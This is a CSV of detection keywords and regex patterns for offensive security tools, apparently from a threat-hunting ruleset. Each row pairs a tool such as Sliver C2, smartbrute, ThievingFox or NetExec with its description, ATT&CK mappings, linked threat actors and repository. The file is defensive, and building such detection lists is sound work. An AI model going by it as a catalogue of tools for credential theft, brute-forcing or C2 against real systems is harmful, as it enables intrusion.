"*sleventyeleven/linuxprivchecker*",".{0,1000}sleventyeleven\/linuxprivchecker.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","1","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","59605"
"*SlinkyCat.ps1*",".{0,1000}SlinkyCat\.ps1.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","59606"
"*SlinkyCat-main*",".{0,1000}SlinkyCat\-main.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","59607"
"*slip* --archive-type * --compression * --paths * --file-content *",".{0,1000}slip.{0,1000}\s\-\-archive\-type\s.{0,1000}\s\-\-compression\s.{0,1000}\s\-\-paths\s.{0,1000}\s\-\-file\-content\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","59608"
"*Sliver C2 Session*",".{0,1000}Sliver\sC2\sSession.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59609"
"*Sliver Copyright (C) 2022 Bishop Fox*",".{0,1000}Sliver\sCopyright\s\(C\)\s2022\sBishop\sFox.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","0","#content","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","59610"
"*Sliver implant*",".{0,1000}Sliver\simplant.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#registry","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59611"
"*sliver.service*",".{0,1000}sliver\.service.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59612"
"*sliver.sh/install*",".{0,1000}sliver\.sh\/install.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59613"
"*sliver/.sliver*",".{0,1000}sliver\/\.sliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59614"
"*sliver:sliver*",".{0,1000}sliver\:sliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59615"
"*sliver_pcap_parser.py*",".{0,1000}sliver_pcap_parser\.py.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59616"
"*sliver-bof-dev-quickstart.md*",".{0,1000}sliver\-bof\-dev\-quickstart\.md.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59617"
"*sliver-client.exe*",".{0,1000}sliver\-client\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59618"
"*sliver-client.log*",".{0,1000}sliver\-client\.log.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","#logfile","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59619"
"*sliver-client_linux*",".{0,1000}sliver\-client_linux.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59620"
"*sliver-client_macos*",".{0,1000}sliver\-client_macos.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59621"
"*sliver-client_windows.exe*",".{0,1000}sliver\-client_windows\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59622"
"*sliver-dns*",".{0,1000}sliver\-dns.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59623"
"*SliverKeylogger*",".{0,1000}SliverKeylogger.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","10","10","159","44","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z","59624"
"*sliverpb*",".{0,1000}sliverpb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59625"
"*sliverpb.Download*",".{0,1000}sliverpb\.Download.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59626"
"*sliverpb.Services*",".{0,1000}sliverpb\.Services.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59627"
"*sliverpb.Shell*",".{0,1000}sliverpb\.Shell.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59628"
"*sliver-server daemon*",".{0,1000}sliver\-server\sdaemon.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59629"
"*sliver-server daemon*",".{0,1000}sliver\-server\sdaemon.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59630"
"*sliver-server operator *",".{0,1000}sliver\-server\soperator\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59631"
"*sliver-server unpack --force*",".{0,1000}sliver\-server\sunpack\s\-\-force.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59632"
"*sliver-server.*",".{0,1000}sliver\-server\..{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59633"
"*sliver-server.exe*",".{0,1000}sliver\-server\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59634"
"*sliver-server-linux.zip*",".{0,1000}sliver\-server\-linux\.zip.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59635"
"*sliver-server-macos.zip*",".{0,1000}sliver\-server\-macos\.zip.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59636"
"*sliver-server-windows.zip*",".{0,1000}sliver\-server\-windows\.zip.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59637"
"*Slowerzs/PPLSystem*","Slowerzs\/PPLSystem","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","1","N/A","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","59638"
"*Slowerzs/ThievingFox*",".{0,1000}Slowerzs\/ThievingFox.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","1","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","59639"
"*slowloris.py*",".{0,1000}slowloris\.py.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59640"
"*SluiEOP.ps1*",".{0,1000}SluiEOP\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","59641"
"*slyd0g/DLLHijackTest*",".{0,1000}slyd0g\/DLLHijackTest.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","N/A","9","4","335","62","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z","59642"
"*slyd0g/SharpClipboard*",".{0,1000}slyd0g\/SharpClipboard.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","1","N/A","N/A","8","1","N/A","N/A","N/A","N/A","59643"
"*Small Shell - Edited By KingDefacer*",".{0,1000}Small\sShell\s\-\sEdited\sBy\sKingDefacer.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","59644"
"*Small tool that allow you to bypass the firewall during COM operations*",".{0,1000}Small\stool\sthat\sallow\syou\sto\sbypass\sthe\sfirewall\sduring\sCOM\soperations.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","59645"
"*smart_try_password_or_hash(*",".{0,1000}smart_try_password_or_hash\(.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","59646"
"*smartbrute *kerberos*",".{0,1000}smartbrute\s.{0,1000}kerberos.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59647"
"*smartbrute%2520brute*",".{0,1000}smartbrute\%2520brute.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","59648"
"*smartbrute.py*",".{0,1000}smartbrute\.py.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","1","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","59649"
"*SmashedPotato.cs*",".{0,1000}SmashedPotato\.cs.{0,1000}","offensive_tool_keyword","SmashedPotato","A modification of @breenmachine original Hot Potato Priv Esc Exploit","T1059 - T1134 - T1201 - T1518","TA0002 - TA0004 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Cn33liz/SmashedPotato","1","1","N/A","N/A","N/A","1","83","35","2016-01-29T14:31:18Z","2016-01-20T20:49:08Z","59650"
"*SmashedPotato.exe*",".{0,1000}SmashedPotato\.exe.{0,1000}","offensive_tool_keyword","SmashedPotato","A modification of @breenmachine original Hot Potato Priv Esc Exploit","T1059 - T1134 - T1201 - T1518","TA0002 - TA0004 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Cn33liz/SmashedPotato","1","1","N/A","N/A","N/A","1","83","35","2016-01-29T14:31:18Z","2016-01-20T20:49:08Z","59651"
"*smb * -u * -p * * -M bh_owned*",".{0,1000}smb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-M\sbh_owned.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","59652"
